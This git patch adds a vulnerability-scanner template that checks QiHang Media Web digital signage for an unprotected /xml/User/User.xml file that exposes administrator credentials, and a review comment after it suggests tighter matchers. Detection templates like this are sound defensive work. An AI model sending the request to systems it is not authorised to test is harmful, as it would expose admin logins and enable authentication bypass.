From f750bf5ba5e44d1fdd240f5d28adf7b10b6c48df Mon Sep 17 00:00:00 2001
From: GwanYeong Kim
Date: Fri, 1 Oct 2021 15:42:48 +0900
Subject: [PATCH] Create qihang-media-web-credentials-disclosure.yaml
The application suffers from clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml and obtain administrative login information that allows for a successful authentication bypass attack.
Signed-off-by: GwanYeong Kim
---
...hang-media-web-credentials-disclosure.yaml | 22 +++++++++++++++++++
1 file changed, 22 insertions(+)
create mode 100644 vulnerabilities/other/qihang-media-web-credentials-disclosure.yaml
diff --git a/vulnerabilities/other/qihang-media-web-credentials-disclosure.yaml b/vulnerabilities/other/qihang-media-web-credentials-disclosure.yaml
new file mode 100644
index 0000000000..018107e323
--- /dev/null
+++ b/vulnerabilities/other/qihang-media-web-credentials-disclosure.yaml
@@ -0,0 +1,22 @@
+id: qihang-media-web-credentials-disclosure
+
+info:
+ name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 - Cleartext Credentials Disclosure
+ author: gy741
+ severity: critical
+ description: The application suffers from clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml and obtain administrative login information that allows for a successful authentication bypass attack.
+ reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php
+ tags: qihang,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/xml/User/User.xml"
+
+ matchers:
+ - type: word
+ words:
+ - "User id"
+ - "account"
+ - "password"
+ condition: and
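Review bot: The `matchers` block decides on three generic words in the response alone, with no status check and no request-level `matchers-condition`. A host that answers unknown paths with a login or error page containing "User id", "account" and "password" would therefore be reported as a `critical` finding. Adding a status matcher joined with `matchers-condition: and` narrows this; if the referenced advisory shows a stable XML element pattern in the response, matching that instead of bare words would narrow it further. Because a true positive means the body held cleartext administrator credentials, the template is best kept without extractors so those values are not copied into scan output.

```yaml
    matchers-condition: and
    matchers:
      # … unchanged: word matcher for "User id", "account", "password" …
      - type: status
        status:
          - 200
```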